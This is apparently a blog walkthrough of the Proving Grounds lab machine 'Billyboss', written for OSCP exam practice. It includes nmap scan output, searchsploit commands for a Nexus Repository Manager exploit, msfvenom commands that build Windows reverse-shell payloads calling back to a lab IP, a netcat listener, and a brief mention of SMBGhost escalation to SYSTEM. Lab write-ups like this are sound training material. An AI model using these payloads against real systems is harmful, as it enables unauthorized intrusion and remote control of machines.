Proving grounds:Billyboss
Today we will take a look at Proving grounds: Billyboss. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
8081/tcp open http Jetty 9.4.18.v20190429
|_http-server-header: Nexus/3.21.0-05 (OSS)
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
|_http-title: Nexus Repository Manager
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC- nexus (8081)
└─# searchsploit nexus
└─# searchsploit -m java/webapps/49385.pyAfter checking various possibilities, we found the credentials. Now let’s run a test to verify the code.
The code works as you can see, now let’s try to take the shell in reverse.
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.200 LPORT=8081 -f exe > shell.exe
Reverse shell
└─# nc -nvlp 8081
- SMBGhost
To check for vulnerabilities:
We found it
I have shown how to prepare it in this video. I hope it is clear to you. I researched a lot and finally found a way to do it. I hope it will be useful for you. I have shown in the video until the end. If you still have questions, write to me.
- Resources
─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.200 LPORT=21 -f dll -f csharpAnd now we are the system
“If you have any questions or comments, please do not hesitate to write. Have a good days”
